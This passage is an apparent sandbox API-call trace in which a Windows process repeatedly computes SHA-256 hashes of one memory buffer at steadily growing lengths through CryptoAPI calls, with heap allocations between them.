	[0196.979] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.979] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ba30
	[0196.979] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230ba30, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ba30, pdwDataLen=0x128aac) returned 1
	[0196.979] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.979] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.979] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.980] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.980] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0196.980] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.980] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ba58
	[0196.980] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ba58, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ba58, pdwDataLen=0x128aac) returned 1
	[0196.980] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.980] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.980] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.980] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.980] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0196.980] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.980] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ba80
	[0196.980] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230ba80, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ba80, pdwDataLen=0x128aac) returned 1
	[0196.980] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.980] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.980] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.981] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.981] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0196.981] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.981] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230baa8
	[0196.981] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230baa8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230baa8, pdwDataLen=0x128aac) returned 1
	[0196.981] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.981] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.981] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.981] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.981] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0196.981] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.981] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bad0
	[0196.981] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bad0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bad0, pdwDataLen=0x128aac) returned 1
	[0196.982] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.982] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.982] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.982] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.982] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0196.982] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230baf8
	[0196.982] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230baf8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230baf8, pdwDataLen=0x128aac) returned 1
	[0196.982] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.982] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.982] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.983] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.983] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0196.983] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.983] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bb20
	[0196.983] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bb20, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bb20, pdwDataLen=0x128aac) returned 1
	[0196.983] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.983] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.983] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.983] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.983] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0196.983] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.983] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bb48
	[0196.983] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230bb48, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bb48, pdwDataLen=0x128aac) returned 1
	[0196.983] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.983] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.983] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.984] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.984] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0196.984] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.984] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bb70
	[0196.984] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bb70, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bb70, pdwDataLen=0x128aac) returned 1
	[0196.984] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.984] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.984] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.984] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.984] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0196.984] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.984] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bb98
	[0196.984] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230bb98, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bb98, pdwDataLen=0x128aac) returned 1
	[0196.984] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.984] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.984] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.985] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.985] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0196.985] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.985] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bbc0
	[0196.985] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bbc0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bbc0, pdwDataLen=0x128aac) returned 1
	[0196.985] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.985] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.985] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.986] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.986] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0196.986] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.986] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bbe8
	[0196.986] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230bbe8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bbe8, pdwDataLen=0x128aac) returned 1
	[0196.986] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.986] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.986] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.986] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.986] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0196.986] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.986] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bc10
	[0196.986] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bc10, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bc10, pdwDataLen=0x128aac) returned 1
	[0196.986] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.987] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.987] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.987] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.987] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0196.987] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bc38
	[0196.987] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230bc38, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bc38, pdwDataLen=0x128aac) returned 1
	[0196.987] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.987] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.987] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.988] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.988] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0196.988] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.988] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bc60
	[0196.988] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bc60, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bc60, pdwDataLen=0x128aac) returned 1
	[0196.988] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.988] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.988] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.989] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.989] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0196.989] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.989] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bc88
	[0196.989] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230bc88, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bc88, pdwDataLen=0x128aac) returned 1
	[0196.989] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.989] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.989] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.989] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.989] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0196.990] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.990] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bcb0
	[0196.990] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bcb0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bcb0, pdwDataLen=0x128aac) returned 1
	[0196.990] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.990] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.990] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.990] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.990] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0196.990] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.990] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bcd8
	[0196.990] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230bcd8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bcd8, pdwDataLen=0x128aac) returned 1
	[0196.990] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.990] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.990] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.991] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.991] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0196.991] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.991] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bd00
	[0196.991] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bd00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bd00, pdwDataLen=0x128aac) returned 1
	[0196.991] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.991] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.991] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.992] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.992] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0196.992] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.992] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bd28
	[0196.992] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230bd28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bd28, pdwDataLen=0x128aac) returned 1
	[0196.992] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.992] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.992] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.993] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.993] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0196.993] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bd50
	[0196.993] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bd50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bd50, pdwDataLen=0x128aac) returned 1
	[0196.993] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.993] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.993] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.993] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.993] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0196.993] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bd78
	[0196.994] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230bd78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bd78, pdwDataLen=0x128aac) returned 1
	[0196.994] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.994] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.994] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.994] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.994] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0196.994] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.994] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bda0
	[0196.994] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bda0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bda0, pdwDataLen=0x128aac) returned 1
	[0196.994] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.994] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.994] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.995] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.995] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0196.995] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.995] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bdc8
	[0196.995] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230bdc8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bdc8, pdwDataLen=0x128aac) returned 1
	[0196.995] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.995] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.995] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.996] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.996] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0196.996] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bdf0
	[0196.996] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bdf0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bdf0, pdwDataLen=0x128aac) returned 1
	[0196.996] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.996] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.996] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.996] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.996] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0196.996] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230be18
